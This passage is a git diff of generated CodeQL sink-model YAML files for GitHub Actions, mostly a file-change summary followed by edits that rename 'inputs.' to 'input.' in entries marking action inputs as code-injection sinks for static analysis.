.../chipsalliance_chisel.model.yml | 4 +- .../chocobozzz_peertube.model.yml | 4 +- .../cilium_cilium-cli.model.yml | 14 +++--- .../composite-actions/cilium_cilium.model.yml | 6 +-- .../citusdata_citus.model.yml | 6 +-- .../clerk_javascript.model.yml | 10 ++-- .../cloud-custodian_cloud-custodian.model.yml | 8 ++-- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 6 +-- .../conan-io_conan-center-index.model.yml | 4 +- .../corretto_corretto-8.model.yml | 8 ++-- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 20 ++++---- .../composite-actions/d2l-ai_d2l-en.model.yml | 8 ++-- ...build-check-deploy-gradle-action.model.yml | 14 +++--- .../datadog_dd-trace-dotnet.model.yml | 10 ++-- .../datadog_dd-trace-go.model.yml | 8 ++-- .../datadog_dd-trace-js.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../davatorium_rofi.model.yml | 6 +-- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 6 +-- .../diggerhq_digger.model.yml | 8 ++-- .../diku-dk_futhark.model.yml | 4 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 6 +-- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 8 ++-- .../eksctl-io_eksctl.model.yml | 6 +-- .../elastic_apm-agent-dotnet.model.yml | 4 +- .../elastic_apm-agent-java.model.yml | 10 ++-- .../elementor_elementor.model.yml | 16 +++---- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 6 +-- .../eonasdan_tempus-dominus.model.yml | 4 +- .../composite-actions/erlang_otp.model.yml | 4 +- .../esphome_esphome.model.yml | 6 +-- .../composite-actions/expensify_app.model.yml | 18 +++---- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 6 +-- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 4 +- .../facebookresearch_xformers.model.yml | 10 ++-- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 8 ++-- .../firebase_firebase-ios-sdk.model.yml | 8 ++-- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 10 ++-- .../composite-actions/fluxcd_flux2.model.yml | 6 +-- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 4 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 6 +-- .../composite-actions/gaphor_gaphor.model.yml | 4 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 10 ++-- .../composite-actions/github_ruby.model.yml | 10 ++-- .../gittools_gitversion.model.yml | 6 +-- .../go-spatial_tegola.model.yml | 4 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 8 ++-- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 10 ++-- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 10 ++-- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 6 +-- .../homebrew_actions.model.yml | 18 +++---- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 6 +-- .../igniterealtime_openfire.model.yml | 6 +-- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 26 +++++----- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 22 ++++----- .../ionic-team_ionicons.model.yml | 18 +++---- .../ionic-team_stencil.model.yml | 12 ++--- .../composite-actions/ipfs_aegir.model.yml | 8 ++-- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 34 ++++++------- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 14 +++--- .../jupyter_docker-stacks.model.yml | 6 +-- .../keycloak_keycloak.model.yml | 6 +-- .../composite-actions/kserve_kserve.model.yml | 6 +-- .../kubeflow_katib.model.yml | 10 ++-- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 4 +- .../kubeshop_botkube.model.yml | 4 +- .../kyverno_kyverno.model.yml | 6 +-- .../composite-actions/lancedb_lance.model.yml | 8 ++-- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 12 ++--- .../ldc-developers_ldc.model.yml | 20 ++++---- .../ledgerhq_ledger-live.model.yml | 6 +-- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 6 +-- .../libgit2_libgit2.model.yml | 14 +++--- .../lightning-ai_pytorch-lightning.model.yml | 16 +++---- .../lightning-ai_torchmetrics.model.yml | 6 +-- .../linkerd_linkerd2.model.yml | 8 ++-- .../logseq_publish-spa.model.yml | 8 ++-- .../macvim-dev_macvim.model.yml | 4 +- .../mamba-org_mamba.model.yml | 6 +-- .../maplibre_maplibre-native.model.yml | 22 ++++----- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 6 +-- .../mdanalysis_mdanalysis.model.yml | 16 +++---- .../medic_cht-core.model.yml | 6 +-- .../medusajs_medusa.model.yml | 6 +-- .../metabase_metabase.model.yml | 24 +++++----- ...etamask_action-create-release-pr.model.yml | 6 +-- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 12 ++--- .../composite-actions/microsoft_wsl.model.yml | 4 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 6 +-- .../mozilla_addons-server.model.yml | 4 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 6 +-- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 6 +-- ..._optic-release-automation-action.model.yml | 6 +-- .../composite-actions/nektos_act.model.yml | 14 +++--- ...4j-contrib_neo4j-apoc-procedures.model.yml | 4 +- .../neondatabase_neon.model.yml | 16 +++---- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 4 +- .../composite-actions/novuhq_novu.model.yml | 2 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 28 +++++------ .../composite-actions/ocaml_dune.model.yml | 10 ++-- .../oneflow-inc_oneflow.model.yml | 14 +++--- ...metry_opentelemetry-ruby-contrib.model.yml | 6 +-- ...pen-telemetry_opentelemetry-ruby.model.yml | 4 +- .../open-watcom_open-watcom-v2.model.yml | 6 +-- .../openapitools_openapi-generator.model.yml | 6 +-- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 6 +-- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 14 +++--- .../openvinotoolkit_openvino.model.yml | 22 ++++----- ...enzeppelin-contracts-upgradeable.model.yml | 14 +++--- ...nzeppelin_openzeppelin-contracts.model.yml | 14 +++--- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 4 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 4 +- .../owntracks_android.model.yml | 4 +- .../pandas-dev_pandas.model.yml | 6 +-- .../pardeike_harmony.model.yml | 8 ++-- .../pennylaneai_pennylane.model.yml | 4 +- .../phalcon_cphalcon.model.yml | 16 +++---- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 10 ++-- .../phpdocumentor_phpdocumentor.model.yml | 4 +- ...necone-io_pinecone-python-client.model.yml | 10 ++-- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 4 +- .../composite-actions/primer_react.model.yml | 4 +- .../project-chip_connectedhomeip.model.yml | 6 +-- .../projectnessie_nessie.model.yml | 8 ++-- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 6 +-- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 4 +- .../quarto-dev_quarto-cli.model.yml | 20 ++++---- .../composite-actions/quay_clair.model.yml | 12 ++--- .../quickwit-oss_quickwit.model.yml | 4 +- .../composite-actions/r-lib_actions.model.yml | 26 +++++----- .../randombit_botan.model.yml | 4 +- .../raspberrypi_documentation.model.yml | 14 +++--- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 10 ++-- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 8 ++-- .../composite-actions/risc0_risc0.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 8 ++-- .../composite-actions/rook_rook.model.yml | 8 ++-- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 10 ++-- .../composite-actions/rusefi_rusefi.model.yml | 10 ++-- .../saltstack_salt.model.yml | 18 +++---- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 4 +- .../composite-actions/scitools_iris.model.yml | 6 +-- .../scylladb_scylla-operator.model.yml | 8 ++-- .../shader-slang_slang.model.yml | 10 ++-- .../shaka-project_shaka-player.model.yml | 8 ++-- ...ode_react-webpack-rails-tutorial.model.yml | 4 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 4 +- .../solidusio_solidus.model.yml | 8 ++-- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 14 +++--- .../sonic-pi-net_sonic-pi.model.yml | 6 +-- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 4 +- .../spring-io_start.spring.io.model.yml | 4 +- .../spring-projects_spring-boot.model.yml | 4 +- ...spring-projects_spring-framework.model.yml | 4 +- .../spring-projects_spring-graphql.model.yml | 4 +- .../square_workflow-kotlin.model.yml | 6 +-- .../stefanprodan_podinfo.model.yml | 4 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 2 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 12 ++--- .../swagger-api_swagger-parser.model.yml | 12 ++--- .../tarantool_tarantool.model.yml | 8 ++-- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 4 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 16 +++---- .../treeverse_lakefs.model.yml | 6 +-- .../trezor_trezor-firmware.model.yml | 8 ++-- .../tribler_tribler.model.yml | 10 ++-- .../trunk-io_trunk-action.model.yml | 16 +++---- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 14 +++--- .../composite-actions/vkcom_vkui.model.yml | 12 ++--- .../vuetifyjs_vuetify.model.yml | 8 ++-- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 16 +++---- .../composite-actions/wazuh_wazuh.model.yml | 6 +-- .../web-infra-dev_rspack.model.yml | 6 +-- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 6 +-- .../composite-actions/zcash_zcash.model.yml | 4 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 4 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 8 ++-- .../actions_reusable-workflows.model.yml | 12 ++--- .../reusable-workflows/adap_flower.model.yml | 6 +-- .../aio-libs_multidict.model.yml | 4 +- .../aio-libs_yarl.model.yml | 4 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 20 ++++---- .../reusable-workflows/apache_flink.model.yml | 4 +- .../reusable-workflows/apache_spark.model.yml | 4 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 6 +-- .../argoproj_argo-rollouts.model.yml | 6 +-- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 16 +++---- .../bbq-beets_avocaddo-cmw.model.yml | 8 ++-- .../bbq-beets_mobile-ci-cd.model.yml | 8 ++-- .../bbq-beets_yujincat-action.model.yml | 4 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 6 +-- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 34 ++++++------- .../celo-org_celo-blockchain.model.yml | 4 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 48 +++++++++---------- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 18 +++---- .../chia-network_actions.model.yml | 4 +- .../chipsalliance_chisel.model.yml | 4 +- .../clickhouse_clickhouse.model.yml | 18 +++---- .../cloudfoundry_cli.model.yml | 2 +- .../cocotb_cocotb.model.yml | 6 +-- .../codeigniter4_codeigniter4.model.yml | 8 ++-- .../com-lihaoyi_mill.model.yml | 4 +- .../cosmos_ibc-go.model.yml | 24 +++++----- .../crowdsecurity_crowdsec.model.yml | 4 +- .../cryptomator_cryptomator.model.yml | 4 +- .../daeuniverse_dae.model.yml | 4 +- .../dafny-lang_dafny.model.yml | 8 ++-- .../dagger_dagger.model.yml | 4 +- .../dash-industry-forum_dash.js.model.yml | 4 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../dbt-labs_dbt-bigquery.model.yml | 18 +++---- .../dbt-labs_dbt-core.model.yml | 8 ++-- .../dbt-labs_dbt-snowflake.model.yml | 18 +++---- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 10 ++-- .../dfhack_dfhack.model.yml | 26 +++++----- .../docker_build-push-action.model.yml | 4 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 34 ++++++------- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 12 ++--- .../etcd-io_bbolt.model.yml | 4 +- .../reusable-workflows/etcd-io_etcd.model.yml | 8 ++-- .../eventstore_eventstore.model.yml | 4 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 20 ++++---- .../falcosecurity_falco.model.yml | 12 ++--- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 8 ++-- .../firebase_firebase-unity-sdk.model.yml | 28 +++++------ .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 16 +++---- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 6 +-- .../foundatiofx_foundatio.model.yml | 6 +-- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 6 +-- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 4 +- .../getsentry_sentry-unity.model.yml | 4 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 4 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 6 +-- .../hadashia_vcontainer.model.yml | 4 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 4 +- .../hashicorp_terraform-cdk.model.yml | 20 ++++---- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 8 ++-- .../hashicorp_vault.model.yml | 22 ++++----- .../reusable-workflows/heroku_cli.model.yml | 4 +- .../hitobito_hitobito.model.yml | 4 +- .../home-assistant_operating-system.model.yml | 4 +- .../homuler_mediapipeunityplugin.model.yml | 12 ++--- .../huggingface_doc-builder.model.yml | 18 +++---- .../huggingface_transformers.model.yml | 4 +- .../hyperion-project_hyperion.ng.model.yml | 6 +-- .../reusable-workflows/ibm_sarama.model.yml | 2 +- ...nloader_icloud_photos_downloader.model.yml | 2 +- .../immich-app_immich.model.yml | 2 +- .../reusable-workflows/inria_spoon.model.yml | 2 +- ...el-device-plugins-for-kubernetes.model.yml | 2 +- .../inverse-inc_packetfence.model.yml | 2 +- .../reusable-workflows/ispc_ispc.model.yml | 2 +- ..._intellij-platform-gradle-plugin.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 16 +++---- .../kairos-io_kairos.model.yml | 36 +++++++------- .../kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 30 ++++++------ .../reusable-workflows/kiali_kiali.model.yml | 22 ++++----- .../kotest_kotest.model.yml | 2 +- .../kubernetes_ingress-nginx.model.yml | 4 +- .../kubescape_kubescape.model.yml | 8 ++-- .../kubeshop_botkube.model.yml | 4 +- .../reusable-workflows/kumahq_kuma.model.yml | 8 ++-- .../labring_sealos.model.yml | 20 ++++---- .../laion-ai_open-assistant.model.yml | 2 +- .../learningequality_kolibri.model.yml | 8 ++-- .../lensesio_stream-reactor.model.yml | 2 +- .../leptos-rs_leptos.model.yml | 6 +-- .../lightning-ai_pytorch-lightning.model.yml | 4 +- .../liquibase_liquibase.model.yml | 2 +- .../litestar-org_litestar.model.yml | 4 +- .../reusable-workflows/llvm_circt.model.yml | 16 +++---- .../lnbits_lnbits.model.yml | 2 +- .../lutris_lutris.model.yml | 2 +- .../reusable-workflows/mailu_mailu.model.yml | 6 +-- .../mamba-org_mamba.model.yml | 4 +- ...anticoresoftware_manticoresearch.model.yml | 18 +++---- .../marcelotduarte_cx_freeze.model.yml | 2 +- ...xaml_materialdesigninxamltoolkit.model.yml | 8 ++-- .../matter-labs_zksync-era.model.yml | 4 +- .../mattermost_desktop.model.yml | 2 +- .../mattermost_mattermost.model.yml | 10 ++-- .../mealie-recipes_mealie.model.yml | 2 +- .../meshery_meshery.model.yml | 22 ++++----- .../meshtastic_firmware.model.yml | 10 ++-- .../microcks_microcks.model.yml | 2 +- ...crosoft_applicationinsights-java.model.yml | 2 +- .../microsoft_chat-copilot.model.yml | 12 ++--- .../microsoft_msquic.model.yml | 26 +++++----- .../microsoft_oryx.model.yml | 2 +- .../microsoft_pr-metrics.model.yml | 2 +- ...oft_react-native-windows-samples.model.yml | 16 +++---- .../microsoft_vscode-cpptools.model.yml | 2 +- .../moby_buildkit.model.yml | 10 ++-- .../reusable-workflows/moby_moby.model.yml | 4 +- .../mosaicml_composer.model.yml | 12 ++--- .../msys2_setup-msys2.model.yml | 4 +- .../mudler_localai.model.yml | 4 +- .../mustardchef_wsabuilds.model.yml | 20 ++++---- .../reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../napari_napari.model.yml | 2 +- .../reusable-workflows/nasa_fprime.model.yml | 8 ++-- .../nautobot_nautobot.model.yml | 2 +- .../reusable-workflows/nektos_act.model.yml | 16 +++---- .../neovim_neovim.model.yml | 2 +- .../nethermindeth_nethermind.model.yml | 12 ++--- .../newrelic_newrelic-dotnet-agent.model.yml | 10 ++-- .../newrelic_newrelic-java-agent.model.yml | 4 +- .../newrelic_node-newrelic.model.yml | 8 ++-- .../nexus-mods_nexusmods.app.model.yml | 8 ++-- .../nginxinc_kubernetes-ingress.model.yml | 22 ++++----- .../nocodb_nocodb.model.yml | 4 +- .../reusable-workflows/novuhq_novu.model.yml | 30 ++++++------ .../npm_abbrev-js.model.yml | 2 +- .../reusable-workflows/npm_cli.model.yml | 4 +- .../npm_fs-minipass.model.yml | 2 +- .../npm_hosted-git-info.model.yml | 2 +- .../reusable-workflows/npm_ini.model.yml | 2 +- ...pm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../npm_mute-stream.model.yml | 2 +- .../npm_node-semver.model.yml | 2 +- .../npm_node-which.model.yml | 2 +- .../reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../npm_write-file-atomic.model.yml | 2 +- .../onflow_cadence.model.yml | 8 ++-- .../open-goal_jak-project.model.yml | 12 ++--- ...pen-telemetry_opentelemetry-demo.model.yml | 2 +- ...try_opentelemetry-dotnet-contrib.model.yml | 4 +- ...n-telemetry_opentelemetry-dotnet.model.yml | 4 +- ...entelemetry-java-instrumentation.model.yml | 4 +- ...lemetry_opentelemetry-js-contrib.model.yml | 2 +- ...telemetry_opentelemetry-operator.model.yml | 6 +-- .../openbao_openbao.model.yml | 12 ++--- .../openhab_openhab-docs.model.yml | 8 ++-- .../openmined_pysyft.model.yml | 4 +- .../opentofu_opentofu.model.yml | 8 ++-- .../openttd_openttd.model.yml | 24 +++++----- .../openvinotoolkit_openvino.model.yml | 2 +- .../reusable-workflows/openxla_iree.model.yml | 14 +++--- .../reusable-workflows/openzfs_zfs.model.yml | 2 +- ...ator-framework_java-operator-sdk.model.yml | 6 +-- .../orange-opensource_hurl.model.yml | 2 +- ...aolosalvatori_servicebusexplorer.model.yml | 4 +- .../parcel-bundler_parcel.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../reusable-workflows/pcsx2_pcsx2.model.yml | 14 +++--- .../pennylaneai_pennylane.model.yml | 6 +-- ...necone-io_pinecone-python-client.model.yml | 2 +- .../pixie-io_pixie.model.yml | 6 +-- .../plantuml_plantuml.model.yml | 2 +- .../powerdns_pdns.model.yml | 6 +-- .../preactjs_preact.model.yml | 4 +- .../prismlauncher_prismlauncher.model.yml | 2 +- .../product-os_flowzone.model.yml | 2 +- .../project-oak_oak.model.yml | 4 +- .../reusable-workflows/prql_prql.model.yml | 2 +- .../pulumi_pulumi.model.yml | 10 ++-- .../puppetlabs_puppetlabs-puppetdb.model.yml | 6 +-- .../reusable-workflows/pyo3_maturin.model.yml | 2 +- .../reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../python_cpython.model.yml | 4 +- .../pytorch_botorch.model.yml | 2 +- .../reusable-workflows/pytorch_xla.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../rancher_dashboard.model.yml | 8 ++-- .../rasterio_rasterio.model.yml | 2 +- .../redisearch_redisearch.model.yml | 2 +- .../remix-run_remix.model.yml | 2 +- .../rmcrackan_libation.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 2 +- .../ruby_ruby.wasm.model.yml | 2 +- .../rustdesk_rustdesk.model.yml | 6 +-- .../saadeghi_daisyui.model.yml | 4 +- .../sagemath_sage.model.yml | 14 +++--- .../schemastore_schemastore.model.yml | 4 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../seleniumhq_selenium.model.yml | 4 +- .../shaka-project_shaka-packager.model.yml | 6 +-- .../shaka-project_shaka-player.model.yml | 8 ++-- .../shimataro_ssh-key-action.model.yml | 2 +- .../softfever_orcaslicer.model.yml | 4 +- ...-mansion_react-native-reanimated.model.yml | 2 +- .../solana-labs_solana.model.yml | 2 +- .../sonarr_sonarr.model.yml | 4 +- .../speedb-io_speedb.model.yml | 4 +- ...ring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../sqlfluff_sqlfluff.model.yml | 6 +-- .../stdlib-js_stdlib.model.yml | 8 ++-- .../stereokit_stereokit.model.yml | 10 ++-- .../streetsidesoftware_cspell.model.yml | 2 +- .../supabase_auth.model.yml | 2 +- .../reusable-workflows/supabase_cli.model.yml | 2 +- .../tencent_hippy.model.yml | 8 ++-- .../tgstation_tgstation.model.yml | 6 +-- .../thesofproject_sof.model.yml | 2 +- .../tiann_kernelsu.model.yml | 6 +-- .../tiledb-inc_tiledb.model.yml | 4 +- .../toeverything_affine.model.yml | 2 +- .../tracel-ai_burn.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../ubisoft_sharpmake.model.yml | 4 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../reusable-workflows/urbit_urbit.model.yml | 4 +- .../uyuni-project_uyuni.model.yml | 4 +- .../vert-x3_vertx-hazelcast.model.yml | 4 +- .../reusable-workflows/vkcom_vkui.model.yml | 2 +- .../walletconnect_web3modal.model.yml | 2 +- .../warzone2100_warzone2100.model.yml | 2 +- .../wasmedge_wasmedge.model.yml | 10 ++-- .../web-infra-dev_rspack.model.yml | 4 +- .../reusable-workflows/werf_werf.model.yml | 32 ++++++------- .../widdix_aws-cf-templates.model.yml | 2 +- .../wildfly_wildfly.model.yml | 8 ++-- .../yt-dlp_yt-dlp.model.yml | 12 ++--- .../zenml-io_zenml.model.yml | 6 +-- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../zitadel_zitadel.model.yml | 8 ++-- 597 files changed, 1937 insertions(+), 1937 deletions(-) diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 4bc9d5ed7712..877543ea8e4f 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] - - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file + - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "input.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 3ce175684905..1c9d4a7f6d98 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] - - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "input.pip-version", "code-injection", "generated"] + 